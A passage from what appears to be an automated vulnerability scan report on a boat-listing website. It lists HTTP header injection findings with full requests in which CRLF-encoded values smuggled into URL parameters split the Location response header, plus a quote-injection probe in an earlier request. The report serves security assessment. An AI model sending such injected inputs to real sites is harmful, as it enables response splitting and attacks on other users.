Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response 1 (redirected)

HTTP/1.0 503 Service Temporarily Unavailable
Date: Thu, 27 Jan 2011 21:16:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...

Request 2

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=USD&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30''&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response 2 (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 21:16:05 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...

2. HTTP header injection previous next
There are 13 instances of this issue:

http://www.yachtworld.com/boats/Power/1 [REST URL parameter 2]
http://www.yachtworld.com/boats/Sail/1 [REST URL parameter 2]
http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [&ywo parameter]
http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter]
http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [slim parameter]
http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [units parameter]
http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [currency parameter]
http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [slim parameter]
http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [units parameter]
https://www.yachtworld.com/ [savedLabel0 cookie]
https://www.yachtworld.com/ [savedLabel1 cookie]
http://wzus1.ask.com/i/i.gif [REST URL parameter 1]
http://wzus1.ask.com/i/i.gif [REST URL parameter 2]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

2.1. http://www.yachtworld.com/boats/Power/1 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/Power/1

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 78c71%0d%0a9de75d3bc43 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /boats/78c71%0d%0a9de75d3bc43/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 301 Moved Permanently
Date: Thu, 27 Jan 2011 19:57:52 GMT
Server: Apache
Cache-Control: private
Location: /boats/category/type/78c71
9de75d3bc43
Connection: close
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Length: 842
Content-Type: text/html; charset=utf-8

<!--
- Unfortunately, Microsoft has added a clever new
- "feature" to Internet Explorer. If the text in
- an error's message is "too small", specifically
- less than 512 bytes, Intern
...[SNIP]...

2.2. http://www.yachtworld.com/boats/Sail/1 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/Sail/1

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload a9e7b%0d%0a05f58214b4d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /boats/a9e7b%0d%0a05f58214b4d/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 301 Moved Permanently
Date: Thu, 27 Jan 2011 19:59:34 GMT
Server: Apache
Cache-Control: private
Location: /boats/category/type/a9e7b
05f58214b4d
Connection: close
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Length: 842
Content-Type: text/html; charset=utf-8

<!--
- Unfortunately, Microsoft has added a clever new
- "feature" to Internet Explorer. If the text in
- an error's message is "too small", specifically
- less than 512 bytes, Intern
...[SNIP]...

2.3. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [&ywo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the &ywo request parameter is copied into the Location response header. The payload a2fcb%0d%0adec8bd846ab was submitted in the &ywo parameter. This caused a response containing an injected HTTP header.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker&hosturl=starlingmarine&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=a2fcb%0d%0adec8bd846ab& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:40:53 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=2275416&lang=en&slim=broker&&hosturl=starlingmarine&&ywo=a2fcb
dec8bd846ab&
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 187

The URL has moved <a href="http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=2275416&lang=en&slim=broker&&hosturl=starlingmarine&&ywo=a2fcb
dec8bd846ab&">here</a>

2.4. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the hosturl request parameter is copied into the Location response header. The payload 5e98e%0d%0a04055d8196f was submitted in the hosturl parameter. This caused a response containing an injected HTTP header.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker&hosturl=5e98e%0d%0a04055d8196f&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:39:37 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=2275416&lang=en&slim=broker&&hosturl=5e98e
04055d8196f&&ywo=starlingmarine&
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 187

The URL has moved <a href="http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=2275416&lang=en&slim=broker&&hosturl=5e98e
04055d8196f&&ywo=starlingmarine&">here</a>

2.5. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [slim parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the slim request parameter is copied into the Location response header. The payload a0d07%0d%0ac827c8a1387 was submitted in the slim parameter. This caused a response containing an injected HTTP header.

Request

